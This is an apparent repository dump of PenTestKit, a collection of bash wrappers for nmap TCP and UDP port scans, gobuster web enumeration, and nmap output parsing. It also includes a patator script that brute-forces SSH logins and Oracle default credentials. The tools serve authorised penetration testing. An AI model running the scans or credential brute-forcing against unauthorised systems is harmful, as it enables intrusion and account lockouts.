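if [[ $EUID -ne 0 ]]; then
  echo "Please run this script as root." 1>&2
  exit 1
fi

# Usage errors go to stderr with a non-zero status so callers can detect them.
if [[ $# -ne 1 ]]; then
  echo "Please provide the target IP address or an IP range." 1>&2
  exit 1
fi

target=$1

# CIDR ranges contain '/', which would turn the -oA basename into a path in a
# directory that does not exist; replace it for the file name only.
nmap -sU -vv -p- --reason --open -oA "udp_ports_full_${target//\//_}" "$target"

--------------------------------------------------------------------------------
/port-scanning/udp/udp-ports-scan-top1000-noping-nodns.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2018 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.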
8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [[ $EUID -ne 0 ]]; then 26 | echo "Please run this script as root." 1>&2 27 | exit 1 28 | fi 29 | 30 | if [ $# -eq 1 ]; then 31 | nmap -sU -n -Pn -vv --top-ports 1000 --reason --open -oA udp_ports_top1000_$1 $1 32 | else 33 | echo "Please provide the target IP address or an IP range." 34 | fi 35 | -------------------------------------------------------------------------------- /reconnaissance/shodan/shodanhat/README.md: -------------------------------------------------------------------------------- 1 | # Dependencies 2 | You need to install shodan with pip install shodan or easy_install shodan.
3 | You need to install python-nmap with pip install python-nmap.
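4 | You need to set your API Key in the 'constantes.py' file. Because that file then holds a secret, keep it out of version control and out of anything you share. 5 | 6 | # Options 7 | -h, --help show this help message and exit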
8 | -i IP, --ip=IP info about one host
9 | -l LIST, --list=LIST info about a list of hosts
10 | -s SQ, --sq=SQ searchquery string
11 | --nmap perform a nmap scan in the hosts
12 | --setkey=SETKEY set your api key automatically
13 | -r RANGE, --range=RANGE scan a range of ips. ex: 192.168.1.1-192.168.1.255
14 | -o OUTPUT, --output=OUTPUT specify a output file

15 | 16 | Nmap Options:
17 | --sS TCP Syn Scan
18 | --sT TCP Connect Scan
19 | --sU UDP Scan 20 | 21 | # Usage 22 | For One Host
23 | python shodanhat.py -i IP
24 | For a list of Hosts
25 | python shodanhat.py -l list.txt
26 | You can also set a searchquery to make a specific query with '-s' option! 27 | 28 | # ScreenShots 29 |
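30 |
--------------------------------------------------------------------------------
/port-scanning/udp/full/udp-ports-scan-full-nodns.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2018 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# For more see the file 'LICENSE' for copying permission.

# Full-range UDP port scan of a single nmap target, without DNS resolution.
#
# Usage:   udp-ports-scan-full-nodns.sh <target>
# Args:    $1 - target IP address or IP range, handed to nmap as one argument
# Output:  udp_ports_full_<target>.{nmap,gnmap,xml} in the current directory,
#          with any "/" in <target> replaced by "_"
# Returns: 1 when not run as root, on a usage error or on a rejected target;
#          otherwise nmap's exit status

if [[ $EUID -ne 0 ]]; then
    echo "Please run this script as root." 1>&2
    exit 1
fi

if [[ $# -ne 1 ]]; then
    echo "Please provide the target IP address or an IP range." 1>&2
    exit 1
fi

target=$1

# Running as root: do not let a value that starts with "-" be parsed by nmap
# as an option in place of a host.
if [[ $target == -* ]]; then
    echo "Target must not start with '-'." 1>&2
    exit 1
fi

# "/" from a CIDR target would make the -oA basename a path into a directory
# that does not exist, so it is replaced in the file name only.
out_base="udp_ports_full_${target//\//_}"

# -n skips DNS resolution; the remaining flags are a verbose UDP scan of every
# port that lists open ports with the reason for their state.
nmap -sU -n -vv -p- --reason --open -oA "$out_base" "$target"
--------------------------------------------------------------------------------
/port-scanning/udp/udp-ports-scan-top1000-fast-noping-nodns.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2018 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 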
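8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [[ $EUID -ne 0 ]]; then 26 | echo "Please run this script as root." 1>&2 27 | exit 1 28 | fi 29 | 30 | if [ $# -eq 1 ]; then 31 | nmap -sU -n -Pn -vv --top-ports 1000 --reason --open -T4 -oA udp_ports_top1000_$1 $1 32 | else 33 | echo "Please provide the target IP address or an IP range." 34 | fi 35 |
--------------------------------------------------------------------------------
/grep/grep-list-hosts-and-open-ports-to-csv.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2024 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# For more see the file 'LICENSE' for copying permission.

# Prints one line per host found in the grepable nmap output (*.gnmap) of a
# directory, in the form "<host>;<port>,<port>,...".
#
# Usage:   grep-list-hosts-and-open-ports-to-csv.sh <directory>
# Args:    $1 - directory that holds the .gnmap files
# Returns: 1 on a usage error, otherwise the status of the pipeline

if [[ $# -ne 1 ]]; then
    echo "Please provide a directory path." 1>&2
    exit 1
fi

scan_dir=$1

# grep -E replaces the obsolescent egrep. -h keeps file names out of the
# output, so the field positions that cut relies on do not depend on how many
# files match or on spaces in the directory name. -e and -- stop a directory
# name that starts with "-" from being read as an option.
grep -E -h -v -e "^#|Status: Up" -- "$scan_dir"/*.gnmap \
    | cut -d' ' -f2,4- \
    | sed 's/Ignored.*//g' \
    | awk '{
        # The host field comes from a scan report: print it as data and never
        # use it as the printf format string.
        printf "%s;", $1
        $1 = ""
        ports = ""
        for (i = 2; i <= NF; i++) { ports = ports $i }
        # split() numbers the entries from 1, so an index loop keeps the ports
        # in report order; "for (e in s)" has no defined order.
        n = split(ports, entry, ",")
        for (k = 1; k <= n; k++) {
            split(entry[k], field, "/")
            printf "%s,", field[1]
        }
        printf "\n"
    }'
--------------------------------------------------------------------------------
/port-scanning/udp/full/udp-ports-scan-full-noping.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2018 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [[ $EUID -ne 0 ]]; then 26 | echo "Please run this script as root." 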
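1>&2 27 | exit 1 28 | fi 29 | 30 | if [ $# -eq 1 ]; then 31 | nmap -sU -vv -p- -Pn --reason --open -oA udp_ports_full_$1 $1 32 | else 33 | echo "Please provide the target IP address or an IP range." 34 | fi 35 |
--------------------------------------------------------------------------------
/web/dir-scanner-gobuster.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2024 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# For more see the file 'LICENSE' for copying permission.

# Content enumeration of one web target with gobuster and the SecLists big.txt
# wordlist; results are written to gobuster_<sanitized URL>.txt.
#
# Usage:   dir-scanner-gobuster.sh <url> <user-agent>
# Args:    $1 - target URL (gobuster -u)
#          $2 - User-Agent string (gobuster -a)
# Returns: 1 on a usage error, otherwise gobuster's exit status

if [[ $# -ne 2 ]]; then
    # Two arguments are required; the previous message named only the URL.
    echo "Please provide the target URL and the User-Agent string." 1>&2
    exit 1
fi

target_url=$1
user_agent=$2

# Log name derived from the URL: runs of "/" and of "." become "_", ":" is
# dropped. A private variable is used because LOGNAME is the conventional
# login-name environment variable; overwriting it would change what gobuster
# and anything else started from this script sees there.
log_file=$(printf '%s\n' "gobuster_${target_url}" \
    | sed -r -e 's/[/]+/_/g' -e 's/[.]+/_/g' -e 's/[:]+//g')
log_file="${log_file}.txt"

# Quoting matters here: a User-Agent normally contains spaces and would
# otherwise be split into several arguments.
# -e prints full URLs, -o writes the results to the log file.
# -k turns off TLS certificate validation, so the identity of the answering
# server is not checked; read the results with that in mind.
gobuster dir -u "$target_url" \
    -w /usr/share/seclists/Discovery/Web-Content/big.txt \
    -a "$user_agent" -e -k -o "$log_file"
--------------------------------------------------------------------------------
/port-scanning/tcp/full/tcp-ports-scan-full-maxrate-noping.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2018 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# For more see the file 'LICENSE' for copying permission.

# Full-range TCP SYN scan of one nmap target with a cap on the send rate and
# without host discovery.
#
# Usage:   tcp-ports-scan-full-maxrate-noping.sh <target> <max-rate>
# Args:    $1 - target IP address or IP range, handed to nmap as one argument
#          $2 - value for nmap --max-rate
# Output:  tcp_ports_full_maxrate_<target>.{nmap,gnmap,xml}, with any "/" in
#          <target> replaced by "_"
# Returns: 1 when not run as root, on a usage error or on a rejected argument;
#          otherwise nmap's exit status

if [[ $EUID -ne 0 ]]; then
    echo "Please run this script as root." 1>&2
    exit 1
fi

if [[ $# -ne 2 ]]; then
    echo "Please provide the target IP address or an IP range and the max rate." 1>&2
    exit 1
fi

target=$1
max_rate=$2

# Running as root: a value that starts with "-" would be parsed by nmap as an
# option in place of a host.
if [[ $target == -* ]]; then
    echo "Target must not start with '-'." 1>&2
    exit 1
fi

# --max-rate takes a number; anything else is rejected here instead of being
# passed on to a root-run nmap.
if ! [[ $max_rate =~ ^[0-9]+([.][0-9]+)?$ ]]; then
    echo "Max rate must be a number." 1>&2
    exit 1
fi

# "/" from a CIDR target would make the -oA basename a path into a directory
# that does not exist, so it is replaced in the file name only.
out_base="tcp_ports_full_maxrate_${target//\//_}"

# -Pn skips host discovery, so every address in the target is scanned.
nmap -sS -vv -p- -Pn --reason --open --max-rate "$max_rate" -oA "$out_base" "$target"
--------------------------------------------------------------------------------
/port-scanning/tcp/full/tcp-ports-scan-full-super-fast-noping-nodns.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2023 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 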
8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | if [[ $EUID -ne 0 ]]; then 25 | echo "Please run this script as root." 1>&2 26 | exit 1 27 | fi 28 | 29 | if [ $# -eq 1 ]; then 30 | nmap -sS -n -Pn -vv -p- --reason --open -T4 --defeat-rst-ratelimit -oA tcp_ports_full_$1 $1 31 | else 32 | echo "Please provide the target IP address or an IP range." 33 | fi 34 | -------------------------------------------------------------------------------- /port-scanning/tcp/full/tcp-ports-scan-full-with-services-noping-nodns-bypass-ids-ips.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2018 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | if [[ $EUID -ne 0 ]]; then 25 | echo "Please run this script as root." 1>&2 26 | exit 1 27 | fi 28 | 29 | if [ $# -eq 1 ]; then 30 | nmap -sT -n -Pn -sV -vv -p- --reason --open -T2 -oA tcp_ports_full_$1 $1 31 | else 32 | echo "Please provide the target IP address or an IP range." 33 | fi 34 |
--------------------------------------------------------------------------------
/cracking/oracle-login.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2020 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# For more see the file 'LICENSE' for copying permission.

# Runs two patator login modules against the host given as $1.
#
# Arguments, as the commands below use them:
#   $1 - target host (host= in both patator calls)
#   $2 - SSH user name for ssh_login AND port for oracle_login
#   $3 - password file for ssh_login (FILE0)
#
# NOTE(review): the usage message names only a host and a port, yet three
# arguments are required and the first command is an SSH login run that reads
# $2 as a user name. This looks like a leftover from another script - confirm.
# As written, every run also sends SSH login attempts to the host, which may
# be outside the scope that the usage text describes.
if [ $# -eq 3 ]; then
    patator ssh_login host=$1 user=$2 password=FILE0 0=$3
    # The two -x ignore rules keep ORA-01017 and ORA-28000 results out of the
    # output. ORA-28000 is Oracle's "account is locked" error, so accounts that
    # get locked by these attempts are not reported here.
    patator oracle_login host=$1 port=$2 user=COMBO00 password=COMBO01 0=/usr/share/seclists/Passwords/Default-Credentials/oracle-betterdefaultpasslist.txt -x ignore:code=ORA-01017 -x ignore:code=ORA-28000

else
    echo "Please provide a target host and a port."
fi
--------------------------------------------------------------------------------
/port-scanning/tcp/services/tcp-services-scan-top1000-noping.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [[ $EUID -ne 0 ]]; then 26 | echo "Please run this script as root." 1>&2 27 | exit 1 28 | fi 29 | 30 | if [ $# -eq 1 ]; then 31 | nmap -sS -vv -A --osscan-guess --version-all -Pn --top-ports 1000 --open -oA tcp_services_1000_$1 $1 32 | else 33 | echo "Please provide the target IP address or an IP range." 
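34 | fi 35 |
--------------------------------------------------------------------------------
/port-scanning/udp/full/udp-ports-scan-full-noping-nodns.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2018 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# For more see the file 'LICENSE' for copying permission.

# Full-range UDP port scan of a single nmap target, without host discovery
# and without DNS resolution.
#
# Usage:   udp-ports-scan-full-noping-nodns.sh <target>
# Args:    $1 - target IP address or IP range, handed to nmap as one argument
# Output:  udp_ports_full_<target>.{nmap,gnmap,xml} in the current directory,
#          with any "/" in <target> replaced by "_"
# Returns: 1 when not run as root, on a usage error or on a rejected target;
#          otherwise nmap's exit status

if [[ $EUID -ne 0 ]]; then
    echo "Please run this script as root." 1>&2
    exit 1
fi

if [[ $# -ne 1 ]]; then
    echo "Please provide the target IP address or an IP range." 1>&2
    exit 1
fi

target=$1

# Running as root: a value that starts with "-" would be parsed by nmap as an
# option in place of a host.
if [[ $target == -* ]]; then
    echo "Target must not start with '-'." 1>&2
    exit 1
fi

# "/" from a CIDR target would make the -oA basename a path into a directory
# that does not exist, so it is replaced in the file name only.
out_base="udp_ports_full_${target//\//_}"

# -Pn skips host discovery, so every address in the target is scanned;
# -n skips DNS resolution.
nmap -sU -n -Pn -vv -p- --reason --open -oA "$out_base" "$target"
--------------------------------------------------------------------------------
/port-scanning/udp/services/udp-services-scan-top1000-noping.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 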
8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [[ $EUID -ne 0 ]]; then 26 | echo "Please run this script as root." 1>&2 27 | exit 1 28 | fi 29 | 30 | if [ $# -eq 1 ]; then 31 | nmap -sU -vv -A --osscan-guess --version-all -Pn --top-ports 1000 --open -oA udp_services_1000_$1 $1 32 | else 33 | echo "Please provide the target IP address or an IP range." 34 | fi 35 | -------------------------------------------------------------------------------- /port-scanning/udp/services/udp-services-scan-top400-noping.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [[ $EUID -ne 0 ]]; then 26 | echo "Please run this script as root." 1>&2 27 | exit 1 28 | fi 29 | 30 | if [ $# -eq 1 ]; then 31 | nmap -sU -vv -A --osscan-guess --version-all -Pn --top-ports 400 --open -oA udp_services_400_$1 $1 32 | else 33 | echo "Please provide the target IP address or an IP range." 34 | fi 35 | -------------------------------------------------------------------------------- /port-scanning/tcp/tcp-ports-scan-top1000-maxrate-noping.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [[ $EUID -ne 0 ]]; then 26 | echo "Please run this script as root." 
1>&2 27 | exit 1 28 | fi 29 | 30 | if [ $# -eq 2 ]; then 31 | nmap -sS -vv --top-ports 1000 --reason --open --max-rate $2 -oA tcp_ports_1000_maxrate_$1 $1 32 | else 33 | echo "Please provide the target IP address or an IP range and the max rate." 34 | fi 35 | -------------------------------------------------------------------------------- /port-scanning/tcp/tcp-ports-scan-top1000-maxrate.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [[ $EUID -ne 0 ]]; then 26 | echo "Please run this script as root." 1>&2 27 | exit 1 28 | fi 29 | 30 | if [ $# -eq 2 ]; then 31 | nmap -sS -vv --top-ports 1000 -Pn --reason --open --max-rate $2 -oA tcp_ports_1000_maxrate_$1 $1 32 | else 33 | echo "Please provide the target IP address or an IP range and the max rate." 
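34 | fi 35 |
--------------------------------------------------------------------------------
/port-scanning/udp/full/udp-ports-scan-full-fast-noping-nodns.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2018 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# For more see the file 'LICENSE' for copying permission.

# Full-range UDP port scan of a single nmap target with the -T4 timing
# template, without host discovery and without DNS resolution.
#
# Usage:   udp-ports-scan-full-fast-noping-nodns.sh <target>
# Args:    $1 - target IP address or IP range, handed to nmap as one argument
# Output:  udp_ports_full_<target>.{nmap,gnmap,xml} in the current directory,
#          with any "/" in <target> replaced by "_"
# Returns: 1 when not run as root, on a usage error or on a rejected target;
#          otherwise nmap's exit status

if [[ $EUID -ne 0 ]]; then
    echo "Please run this script as root." 1>&2
    exit 1
fi

if [[ $# -ne 1 ]]; then
    echo "Please provide the target IP address or an IP range." 1>&2
    exit 1
fi

target=$1

# Running as root: a value that starts with "-" would be parsed by nmap as an
# option in place of a host.
if [[ $target == -* ]]; then
    echo "Target must not start with '-'." 1>&2
    exit 1
fi

# "/" from a CIDR target would make the -oA basename a path into a directory
# that does not exist, so it is replaced in the file name only.
out_base="udp_ports_full_${target//\//_}"

# Same base name as the other udp_ports_full_* scripts in this kit, so a later
# run for the same target overwrites the earlier results.
nmap -sU -n -Pn -vv -p- --reason --open -T4 -oA "$out_base" "$target"
--------------------------------------------------------------------------------
/grep/grep-list-hosts-and-open-ports-to-matrix.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 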
8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | if [ $# -eq 1 ]; then 25 | 26 | egrep -v "^#|Status: Up" $1/*.gnmap|cut -d' ' -f2,4-| sed 's/Ignored.*//g' | awk '{printf $1 ";" NF-1 ";"; $1=""; for(i=2; i<=NF; i++) { a=a""$i; }; split(a,s,","); for(e in s) { split(s[e],v,"/"); printf "%s(%s),", v[1], v[5]}; a=""; printf "\n"; }' 27 | 28 | else 29 | echo "Please provide a directory path." 30 | fi 31 | -------------------------------------------------------------------------------- /misc/print-top-udp-ports.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2018 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
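See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# For more see the file 'LICENSE' for copying permission.


# Usage: <script> <number-of-ports>
# Runs nmap's UDP scan with --top-ports N and no target, asks for XML on
# stdout (-oX -) and keeps the line that contains 'services='.

if [[ $EUID -ne 0 ]]; then
  echo "Please run this script as root." 1>&2
  exit 1
fi

# Misuse is reported on stderr with a non-zero status, like the root check.
if [[ $# -ne 1 ]]; then
  echo "Please provide number of ports." 1>&2
  exit 1
fi

# NOTE(review): the sed expression below is reproduced exactly as listed and
# looks truncated (angle-bracketed text appears to have been stripped from this
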